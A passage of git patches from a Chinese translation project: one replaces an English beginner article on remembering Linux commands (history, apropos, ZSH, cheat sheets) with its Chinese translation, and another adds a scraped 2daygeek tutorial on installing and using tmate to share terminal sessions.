+[a]:https://dzone.com/users/307701/lmacvittie.html +[1]:https://f5.com/about-us/blog/articles/go-beyond-polb-plain-old-load-balancing +[2]:https://f5.com/about-us/blog/articles/ingress-controllers-new-name-familiar-function-27388 +[3]:http://clouddocs.f5.com/products/asp/v1.0/ +[4]:https://devcentral.f5.com/Portals/0/Users/038/38/38/unavailable_is_closed.png?ver=2017-09-12-082118-160 +[5]:https://devcentral.f5.com/Portals/0/Users/038/38/38/per-node_forward_proxy.jpg?ver=2017-09-14-072419-667 +[6]:https://devcentral.f5.com/Portals/0/Users/038/38/38/per-pod_sidecar_proxy.jpg?ver=2017-09-14-072424-073 +[7]:https://dzone.com/users/307701/lmacvittie.html +[8]:https://dzone.com/users/307701/lmacvittie.html +[9]:https://dzone.com/articles/proxy-models-in-container-environments# +[10]:https://dzone.com/cloud-computing-tutorials-tools-news +[11]:https://dzone.com/articles/proxy-models-in-container-environments# +[12]:https://dzone.com/go?i=243221&u=https%3A%2F%2Fget.platform9.com%2Fjzlp-kubernetes-deployment-models-the-ultimate-guide%2F From 738adc3cc828827e3af8a728cd9744cafab149fd Mon Sep 17 00:00:00 2001 From: DarkSun Date: Wed, 29 Nov 2017 11:15:42 +0800 Subject: [PATCH 0039/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= =?UTF-8?q?=2020171117=20how=20to=20easily=20remember=20linux=20commands.m?= =?UTF-8?q?d=20(#6366)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * translated * 翻译完毕 --- ...7 How to Easily Remember Linux Commands.md | 126 ------------------ ...7 How to Easily Remember Linux Commands.md | 74 ++++++++++ 2 files changed, 74 insertions(+), 126 deletions(-) delete mode 100644 sources/tech/20171117 How to Easily Remember Linux Commands.md create mode 100644 translated/tech/20171117 How to Easily Remember Linux Commands.md diff --git a/sources/tech/20171117 How to Easily Remember Linux Commands.md b/sources/tech/20171117 How to Easily Remember Linux Commands.md deleted file mode 100644 index fe69efb128..0000000000 --- a/sources/tech/20171117 How to Easily Remember Linux Commands.md +++ /dev/null @@ -1,126 +0,0 @@ -translating by darksun -# How to Easily Remember Linux Commands - -![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) - - -The command line can be daunting for new Linux users. Part of that is -remembering the multitude of commands available. After all, in order to use -the command line effectively, you need to know the commands. - -Unfortunately, there's no getting around the fact that you need to learn the -commands, but there are some tools that can help you out when you're getting -started. - -## History - -![Linux Bash History Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash-history.jpg) - -The first thing you can use to remember commands that you've already used is -your own command line history. Most [Linux shells](https://www.maketecheasier.com/remember-linux-commands/), including -the most common default, Bash, create a history file that lists your past -commands. For Bash, you can find it at "/home//.bash_history." - -It's a plain text file, so you can open it in any text editor and loop back -through or even search. - -## Apropos - -There's actually a command that helps you find _other_ commands. It 's called -"apropos," and it helps you find the appropriate command to complete the -action you search or. For example, if you need to know the command to list the -contents of a directory, you can run the following command: - -[code] - - apropos "list directory" -[/code] - -![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) - -There's a catch, though. It's very literal. Add an "s" to "directory," and try -again. - -[code] - - apropos "list directories" -[/code] - -It doesn't work. What `apropos` does is search through a list of commands and -the accompanying descriptions. If your search doesn't match the description, -it won't pick up the command as a result. - -There is something else you can do. By using the `-a` flag, you can add -together search terms in a more flexible way. Try this command: - -[code] - - apropos "match pattern" -[/code] - -![Linux Apropos -a Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) - -You'd think it'd turn up something, like -[grep](https://www.maketecheasier.com/remember-linux-commands/)? Instead, you -get nothing. Again, apropos is being too literal. Now, try separating the -words and using the `-a` flag. - -[code] - - apropos "match" -a "pattern" -[/code] - -Suddenly, you have many of the results that you'd expect. - -apropos is a great tool, but you always need to be aware of its quirks. - -## ZSH - -![Linux ZSH -Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc- -zsh.jpg)![Linux ZSH -Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc- -zsh.jpg) - -ZSH isn't really a tool for remembering commands. It's actually an alternative -shell. You can substitute [ZSH](https://www.maketecheasier.com/remember-linux- -commands/) for Bash and use it as your command line shell. ZSH -includes an autocorrect feature that catches you if you enter in a command -wrong or misspell something. If you enable it, it'll ask you if you meant -something close. You can continue to use the command line as you normally -would with ZSH, but you get an extra safety net and some other really nice -features, too. The easiest way to get the most of ZSH is with [Oh-My- -ZSH](https://www.maketecheasier.com/remember-linux-commands/). - -## Cheat Sheet - -The last, and probably simplest, option is to use a [cheat sheet](https://www.maketecheasier.com/remember-linux-commands/). There are plenty available online like [this -one](https://www.maketecheasier.com/remember-linux-commands/) that you can use to look up commands quickly. - -![linux-commandline-cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux-commandline-cheatsheet.gif) - -You can actually even find them in image form and set one as your desktop -wallpaper for quick reference. - -This isn't the best solution for actually remembering the commands, but when -you're starting out, it can save you from doing a search online every time you -don't remember a command. - -Rely on these methods when you're learning, and eventually you'll find -yourself referring to them less and less. No one remembers everything, so -don't feel bad if you occasionally forget or run into something you haven't -seen before. That's what these resources and, of course, the Internet are -there for. - - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/remember-linux-commands/ - -作者:[Nick Congleton][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - diff --git a/translated/tech/20171117 How to Easily Remember Linux Commands.md b/translated/tech/20171117 How to Easily Remember Linux Commands.md new file mode 100644 index 0000000000..8e4483cd20 --- /dev/null +++ b/translated/tech/20171117 How to Easily Remember Linux Commands.md @@ -0,0 +1,74 @@ +# How to Easily Remember Linux Commands + +![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) + + +Linux 新手往往对命令行心存畏惧。部分原因是因为需要记忆大量的命令。毕竟掌握命令是高效使用命令行的前提。 +不幸的是,学习这些命令并无捷径,然而在你开始学习命令之初,有些工具还是可以帮到你的。 +## History + +![Linux Bash History 命令](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash-history.jpg) + +首先要介绍的是命令行工具 history。它能帮你记住那些你曾经用过的命令。大多数 [Linux shells](https://www.maketecheasier.com/remember-linux-commands/),包括应用最广泛的 Bash,都会创建一个历史文件来包含那些你输入过的命令。如果你用的是 Bash,这个历史文件就是 "/home//.bash_history"。 +这个历史文件是纯文本格式的,你可以用任意的文本编辑器打开来浏览和搜索。 +## Apropos + +确实存在有一个命令可以帮你找到其他命令。这个命令就是 "apropos",它能帮你找出合适的命令来完成你搜索的操作。比如,假设你需要知道哪个命令可以列出目录的内容,你可以运行下面命令: + +```shell + apropos "list directory" +``` + +![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) + +这就搜索出结果了。非常直接。给 "directory" 加上 "s" 后再试一下。 + +```shell + apropos "list directories" +``` + +这次没用了。`apropos` 所作的其实就是搜索一系列命令的描述。描述不匹配的命令不会纳入结果中。 +还有其他的用法。通过 `-a` 标志,你可以以更灵活的方式来增加搜索关键字。试试这条命令: + +```shell + apropos "match pattern" +``` + +![Linux Apropos -a Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) + +你会觉得应该会有一些匹配的内容出现,比如 [grep](https://www.maketecheasier.com/remember-linux-commands/) 对吗? +然而,实际上并没有匹配出任何结果。再说一次,apropos 只会根据字面内容进行搜索。 +现在让我们试着用 `-a` 标志来把单词分割开来。 + +```shell + apropos "match" -a "pattern" +``` + +这一下,你可以看到很多期望的结果了。 +apropos 是一个很棒的工具,不过你需要留意它的缺陷。 +## ZSH + +![Linux ZSH Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc-zsh.jpg) + +ZSH 其实并不是用于记忆命令的工具。它其实是一种 shell。你可以用 [ZSH](https://www.maketecheasier.com/remember-linux-commands/) 来替代 Bash 作为你的命令行 shell。ZSH 包含了自动纠错机制,能在你输入命令的时候给你予提示。 +开启该功能后,它会提示你相近的选择想面。在 ZSH 中你可以像往常一样使用命令行,同时你还能享受到极度安全的网络以及其他一些非常好用的特性。充分利用 ZSH 的最简单方法就是使用 [Oh-My-ZSH](https://www.maketecheasier.com/remember-linux-commands/)。 +## Cheat Sheet + +最后,也可能是最间的方法就是使用 [cheat sheet](https://www.maketecheasier.com/remember-linux-commands/)。 +有很多在线的 cheat sheet,比如[这个](https://www.maketecheasier.com/remember-linux-commands/) 可以帮助你快速查询命令。 +![linux-commandline-cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux-commandline-cheatsheet.gif) + +为了快速查询,你可以寻找图片格式的 cheat sheet 然后将它设置为你的桌面墙纸。 +这并不是记忆命令的最好方法,但是这么做可以帮你节省在线搜索遗忘命令的时间。 +在学习时依赖这些方法,最终你会发现你会越来越少地使用这些工具。 +没有人能够记住所有的事情,因此偶尔遗忘掉某些东西或者遇到某些没有见过的东西也很正常。这也是这些工具以及因特网存在的意义。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/remember-linux-commands/ + +作者:[Nick Congleton][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From cca9f7ac67127bac0d32f31df2ab8ad0ba4b53ca Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 29 Nov 2017 11:18:33 +0800 Subject: [PATCH 0040/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20tmate=20?= =?UTF-8?q?=E2=80=93=20Instantly=20Share=20Your=20Terminal=20Session=20To?= =?UTF-8?q?=20Anyone=20In=20Seconds?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...our Terminal Session To Anyone In Seconds.md | 612 ++++++++++++++++++ 1 file changed, 612 insertions(+) create mode 100644 sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md new file mode 100644 index 0000000000..efa99115b8 --- /dev/null +++ b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -0,0 +1,612 @@ +::: {#wrapper} +::: {.mobile-title-logo-in-header} +[![2daygeek.com](https://www.2daygeek.com/wp-content/uploads/2015/12/2day-geek-new-logo-final.png)](https://www.2daygeek.com/ "2daygeek.com | Home page"){.custom-logo-link} +::: + +::: {.ham__navbar-toggler-two .collapsed title="Menu" aria-expanded="false"} +::: {.ham__navbar-span-wrapper} +[]{.line .line-1} []{.line .line-2} []{.line .line-3} +::: +::: + +::: {.nav-text} +::: + +::: {.nav-wrap .container} +-
+ +
+ + + +- [[LINUX + DISTRO'S](https://www.2daygeek.com/category/linux-distributions/)]{#menu-item-6808} +- [[LINUX + COMMAND'S](https://www.2daygeek.com/category/linux-commands/)]{#menu-item-6806} +- [[WEBSERVER](https://www.2daygeek.com/category/webserver/)]{#menu-item-9582} +- [[MONITORING + TOOLS](https://www.2daygeek.com/category/monitoring-tools/)]{#menu-item-6809} +- [[PACKAGE + MANAGEMENT](https://www.2daygeek.com/category/package-management/)]{#menu-item-6883} +- [[REPOSITORY](https://www.2daygeek.com/category/repository/)]{#menu-item-6811} +- [[CLOUD + STORAGE](https://www.2daygeek.com/category/free-cloud-storage/)]{#menu-item-6986} +- [[HACKING](https://gbhackers.com/)]{#menu-item-14871} + - [[Tutorials](https://gbhackers.com/)]{#menu-item-14872} +::: + +::: {.nav-text} +::: + +::: {.topbar-toggle-down} +::: + +::: {.nav-wrap .container} +- [[HOME](https://www.2daygeek.com/)]{#menu-item-293} +- [[LINUX NEWS](http://linuxnews.2daygeek.com/)]{#menu-item-10920} +- [[ABOUT US](https://www.2daygeek.com/about-us/)]{#menu-item-294} +- [[CONTACT US](https://www.2daygeek.com/contact-us/)]{#menu-item-295} +- [[DISCLAIMER](https://www.2daygeek.com/disclaimer/)]{#menu-item-296} +- [[PRIVACY + POLICY](https://www.2daygeek.com/privacy-policy/)]{#menu-item-3676} +- [[SUPPORT + US](https://www.2daygeek.com/support-us/)]{#menu-item-2729} +- [[OS + TWEAK](https://www.2daygeek.com/category/os-tweaks/)]{#menu-item-8366} +- [[ICONS](https://www.2daygeek.com/category/icon-theme/)]{#menu-item-12012} +- [[THEMES](https://www.2daygeek.com/category/gtk-theme/)]{#menu-item-12013} +::: + +::: {#topbar-header-search .container} +::: {.container-inner} +::: {.toggle-search} +::: + +::: {.search-expand} +::: {.search-expand-inner} +
+ +
+::: +::: +::: +::: + +::: {.container .group} +::: {.container-inner} +::: {.group .pad .central-header-zone} +::: {.logo-tagline-group} +[![2daygeek.com](https://www.2daygeek.com/wp-content/uploads/2015/12/2day-geek-new-logo-final.png)](https://www.2daygeek.com/ "2daygeek.com | Home page"){.custom-logo-link} +::: + +::: {#header-widgets} +::: {style="float:left;border:solid 0px;height:90px;width:728px;"} +[]{.underline} +::: +::: +::: + +::: {.nav-text} +::: + +::: {.nav-wrap .container} +- [LINUX + DISTRO'S](https://www.2daygeek.com/category/linux-distributions/) +- [LINUX COMMAND'S](https://www.2daygeek.com/category/linux-commands/) +- [WEBSERVER](https://www.2daygeek.com/category/webserver/) +- [MONITORING + TOOLS](https://www.2daygeek.com/category/monitoring-tools/) +- [PACKAGE + MANAGEMENT](https://www.2daygeek.com/category/package-management/) +- [REPOSITORY](https://www.2daygeek.com/category/repository/) +- [CLOUD + STORAGE](https://www.2daygeek.com/category/free-cloud-storage/) +- [HACKING](https://gbhackers.com/) + - [Tutorials](https://gbhackers.com/) +::: +::: +::: + +::: {#page .container} +::: {.container-inner} +::: {.main} +::: {.main-inner .group} +::: {.section .content} +::: {.page-title .pad .group} +- [Apps](https://www.2daygeek.com/category/apps/) +::: + +::: {.pad .group} +::: {.post-inner .group} +tmate -- Instantly Share Your Terminal Session To Anyone In Seconds {#tmate-instantly-share-your-terminal-session-to-anyone-in-seconds .post-title .entry-title} +=================================================================== + +by [ [[Magesh +Maruthamuthu](https://www.2daygeek.com/author/magesh/ "Posts by Magesh Maruthamuthu")]{.fn} +]{.vcard .author} · [Published : November 28, 2017 \|\| Last Updated: +November 28, 2017]{.published} + +::: {.clear} +::: + +::: {.entry .themeform} +::: {.entry-inner} +::: {style="float:left;margin:10px 10px 10px 0;"} +[]{.underline} +::: + +A while ago, we wrote about +[teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) +which is used to share terminal instantly to anyone (whoever you +trusting). Today also we are going to discuss about same kind of +application called tmate. + +Why you want tmate application? this will help you to get help from your +friends when you need. + +#### What Is tmate? + +[tmate](https://tmate.io/) stands for teammates, it's a fork of tmux, +and uses the same configurations such as keybindings, color schemes etc. +It's a terminal multiplexer with instant terminal sharing. it enables a +number of terminals to be created, accessed, and controlled from a +single screen, that can be shared with another mates. + +You can detach the session by leaving the job running in background and +re-attach the session when you want to view the status. tmate provides +an instant pairing solution, allowing you to share a terminal with one +or several teammates. + +A status line at the bottom of the screen shows information on the +current session, such as ssh command to share with your mate. + +#### How tmate works? + +- When launching tmate, an ssh connection is established to tmate.io + (backend servers maintained by tmate developers) in the background + through libssh. +- The server (tmate.io) ssh key signatures are verified during the DH + exchange. +- The client is authenticated with local ssh keys. +- Once connection is established, a 150 bits (non guessable random + characters) session token is generated by local tmux server. +- teammates can connect to tmate.io using the SSH session ID provided + by user + +#### Prerequisites for tmate + +Generate SSH key as a prerequisites since tmate.io server authenticate +client machine through local ssh keys. Make a note, every system should +have SSH key. + + $ ssh-keygen -t rsa + Generating public/private rsa key pair. + Enter file in which to save the key (/home/magi/.ssh/id_rsa): + Enter passphrase (empty for no passphrase): + Enter same passphrase again: + Your identification has been saved in /home/magi/.ssh/id_rsa. + Your public key has been saved in /home/magi/.ssh/id_rsa.pub. + The key fingerprint is: + SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 [email protected] + The key's randomart image is: + +---[RSA 2048]----+ + | | + | | + | . | + | . . = o | + | *ooS= . + o | + | . [email protected]*o.o.+ E .| + | =o==B++o = . | + | o.+*o+.. . | + | ..o+o=. | + +----[SHA256]-----+ + +#### How to Install tmate + +tmate is available in few of the distribution official repository that +can be installed through package manager. + +For **`Debian/Ubuntu`**, use [APT-GET +Command](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) +or [APT +Command](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to +install tmate. + +::: {style="float:left;margin:10px 10px 10px 0;"} +[]{.underline} +::: + + $ sudo apt-get install software-properties-common + $ sudo add-apt-repository ppa:tmate.io/archive + $ sudo apt-get update + $ sudo apt-get install tmate + +Also, you can install tmate package from distribution official +repository. + + $ sudo apt-get install tmate + +For **`Fedora`**, use [DNF +Command](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) +to install tmate. + + $ sudo dnf install tmate + +For **`Arch Linux`** based systems, use []()[Yaourt +Command](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) +or []()[Packer +Command](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) +to install tmate from AUR repository. + + $ yaourt -S tmate + or + $ packer -S tmate + +For **`openSUSE`**, use [Zypper +Command](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) +to install tmate. + + $ sudo zypper in tmate + +#### How To Use tmate + +After successfully installed, open your terminal and fire the following +command which will open the new session for you and in the bottom of the +screen you can able to see the SSH session ID. + + $ tmate + +[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15269 width="1051" +height="643"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15269 width="1051" +height="643"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) + +Make a note, the SSH session ID will disappear after a few seconds, so +don't worry you can get those details using following command. + +::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} +[]{.underline} +::: + + $ tmate show-messages + +The tmate show-messages command allows you to see tmate's log messages, +including the ssh connection string.\ +[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15270 width="1051" +height="643"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15270 width="1051" +height="643"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) + +Now, share your SSH session ID to your friends or coworkers and allow +them to view the terminal session. Not only SSH session ID, +alternatively you can share web URL as well, also you can share either +read only sessions or read-write sessions? + +#### How to connect session through SSH + +Just run the SSH session ID which you got from your friend on terminal. +It's like similar to below. + + $ ssh session: ssh [email protected] + +[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15273 width="869" +height="625"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15273 width="869" +height="625"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) + +#### How to connect session through Web URL + +Open the browser and access the URL which you got from your friend. It's +like similar to below.\ +[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15274 width="1024" +height="708"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter +.size-full .wp-image-15274 width="1024" +height="708"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) + +::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} +::: + +Just type `exit` to exit from the session. + +::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} +::: + + [Source System Output] + [exited] + + [Remote System Output] + [server exited] + Connection to sg2.tmate.io closed by remote host. + Connection to sg2.tmate.io closed. + +::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} +[]{.underline} +::: + +::: {style="font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both"} +::: +::: + +::: {.clear} +::: +::: +::: + +::: {.clear} +::: + +Tags: [Application](https://www.2daygeek.com/tag/application/)[Instant +terminal +sharing](https://www.2daygeek.com/tag/instant-terminal-sharing/)[Linux](https://www.2daygeek.com/tag/linux/)[tmate](https://www.2daygeek.com/tag/tmate/) + +::: {.author-bio} +::: {.bio-avatar} +![](https://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif){.avatar +.avatar-128 .photo width="128" height="128" +srcset="https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=256&d=mm&r=g 2x"} + +![](https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=128&d=mm&r=g){.avatar +.avatar-128 .photo width="128" height="128" +srcset="https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=256&d=mm&r=g 2x"} +::: + +Magesh Maruthamuthu + +Love to play with all Linux distribution + +::: {.clear} +::: +::: + +- - [**Previous story** How To Empty a File, Delete N Lines From a + File, Remove Matching String From a File, And Remove Empty/Blank + Lines From a File In + Linux?](https://www.2daygeek.com/empty-a-file-delete-contents-lines-from-a-file-remove-matching-string-from-a-file-remove-empty-blank-lines-from-a-file/) + +#### You may also like\... {#you-may-also-like... .heading} + +- ::: {.post-thumbnail} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ::: + + ::: {.related-inner} + #### [wikipedia2text -- A Command Line Tool For Querying The Wikipedia Article](https://www.2daygeek.com/wikipedia2text-wiki-cli-access-query-read-wikipedia-page-article-in-linux-command-line/ "wikipedia2text – A Command Line Tool For Querying The Wikipedia Article") {#wikipedia2text-a-command-line-tool-for-querying-the-wikipedia-article .post-title .entry-title} + + ::: {.post-meta .group} + October 17, 2017 + ::: + ::: + +- ::: {.post-thumbnail} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ::: + + ::: {.related-inner} + #### [RTV (Reddit Terminal Viewer) -- A Simple Terminal Viewer For Reddit](https://www.2daygeek.com/rtv-reddit-terminal-viewer-a-simple-terminal-viewer-for-reddit/ "RTV (Reddit Terminal Viewer) – A Simple Terminal Viewer For Reddit") {#rtv-reddit-terminal-viewer-a-simple-terminal-viewer-for-reddit .post-title .entry-title} + + ::: {.post-meta .group} + October 13, 2017 + ::: + ::: + +- ::: {.post-thumbnail} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium + .size-thumb-medium .wp-post-image width="520" height="245"} + ::: + + ::: {.related-inner} + #### [Teleconsole -- A Tool To Share Your Terminal Session Instantly To Anyone In Seconds](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/ "Teleconsole – A Tool To Share Your Terminal Session Instantly To Anyone In Seconds") {#teleconsole-a-tool-to-share-your-terminal-session-instantly-to-anyone-in-seconds .post-title .entry-title} + + ::: {.post-meta .group} + November 6, 2017 + ::: + ::: + +::: {#disqus_thread} +::: +::: +::: + +::: {.sidebar .s1 .collapsed data-position="right" data-layout="col-2cl" data-sb-id="s1"} +[]{.sidebar-toggle} + +::: {.sidebar-content} +::: {.sidebar-top .group} +Follow: + +- [](https://www.facebook.com/2daygeek "Facebook"){.social-tooltip} +- [](https://www.twitter.com/2daygeek "Twitter"){.social-tooltip} +- [](https://www.google.com/+2daygeeks "Google+"){.social-tooltip} +- [](https://www.linkedin.com/company/2daygeek "Linkein"){.social-tooltip} +- [](javascript:void(0) "Pinterest"){.social-tooltip} +- [](http://2daygeek.tumblr.com/ "Tumblr"){.social-tooltip} +::: + +::: {#text-8 .widget .widget_text} +### -- Click Here To Get Offers -- {#click-here-to-get-offers .widget-title} + +::: {.textwidget} +[]{.underline} +::: +::: + +::: {#text-10 .widget .widget_text} +### -- For Better Offers -- {#for-better-offers .widget-title} + +::: {.textwidget} +::: +::: + +::: {#text-12 .widget .widget_text} +### -Unmatched Offers For Linux Users- {#unmatched-offers-for-linux-users- .widget-title} + +::: {.textwidget} +::: +::: + +::: {#wp_subscribe-3 .widget .wp_subscribe} +::: {#wp-subscribe .wp-subscribe-wrap .wp-subscribe .wp-subscribe-1 data-thanks_page="0" data-thanks_page_url="" data-thanks_page_new_window="0"} +#### Get Latest LINUX Tips {#get-latest-linux-tips .title} + +::: {.wp-subscribe-loader} +::: + +Thank you for subscribing. + +Something went wrong. + +::: {.clear} +::: +::: +::: + +::: {#text-3 .widget .widget_text} +::: {.textwidget} +::: +::: + +::: {#text-6 .widget .widget_text} +::: {.textwidget} +::: {#google_translate_element} +::: +::: +::: + +::: {#text-5 .widget .widget_text} +### Follow us {#follow-us .widget-title} + +::: {.textwidget} +::: {.g-page data-href="//plus.google.com/107364365185869631781" data-layout="landscape" data-rel="publisher"} +::: +::: +::: +::: +::: +::: +::: +::: +::: + +::: {#footer-bottom .section .container} +::: {.container-inner} +[](#){#back-to-top} + +::: {.pad .group} +::: {.grid .one-half} +::: {#copyright} +2daygeek.com © 2017. All Rights Reserved. +::: + +::: {#credit style=""} +[2daygeek](https://www.2daygeek.com) :- Linux Tips & Tricks, Linux +How-to Guides & Tutorials is licensed under a [(cc) +BY-NC](https://creativecommons.org/licenses/by-nc/4.0/) +::: +::: + +::: {.grid .one-half .last} +- [](https://www.facebook.com/2daygeek "Facebook"){.social-tooltip} +- [](https://www.twitter.com/2daygeek "Twitter"){.social-tooltip} +- [](https://www.google.com/+2daygeeks "Google+"){.social-tooltip} +- [](https://www.linkedin.com/company/2daygeek "Linkein"){.social-tooltip} +- [](javascript:void(0) "Pinterest"){.social-tooltip} +- [](http://2daygeek.tumblr.com/ "Tumblr"){.social-tooltip} +::: +::: +::: +::: +::: + +::: {#crestashareicon .cresta-share-icon .sameColors .first_style .show-count-active} +::: {#facebook-cresta .sbutton .crestaShadow .facebook-cresta-share .float} +[](https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&t=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds "Share to Facebook") +::: + +::: {#twitter-cresta .sbutton .crestaShadow .twitter-cresta-share .float .withCount} +[](https://twitter.com/share?text=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds&url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&via=2daygeek "Share to Twitter") +::: + +::: {#googleplus-cresta .sbutton .crestaShadow .googleplus-cresta-share .float} +[](https://plus.google.com/share?url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F "Share to Google Plus") +::: + +::: {#linkedin-cresta .sbutton .crestaShadow .linkedin-cresta-share .float} +[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&title=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds&source=https://www.2daygeek.com/ "Share to LinkedIn") +::: + +::: {#pinterest-cresta .sbutton .crestaShadow .pinterest-cresta-share .float} +[](https://pinterest.com/pin/create/bookmarklet/?url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&media=https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds.png&description=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds "Share to Pinterest") +::: + +::: {#total-shares .sbutton} +[]{#total-count .cresta-the-total-count}[Shares]{.cresta-the-total-text} +::: + +::: {style="clear: both;"} +::: +::: + +::: {#spu-bg} +::: + +::: {#spu-main} 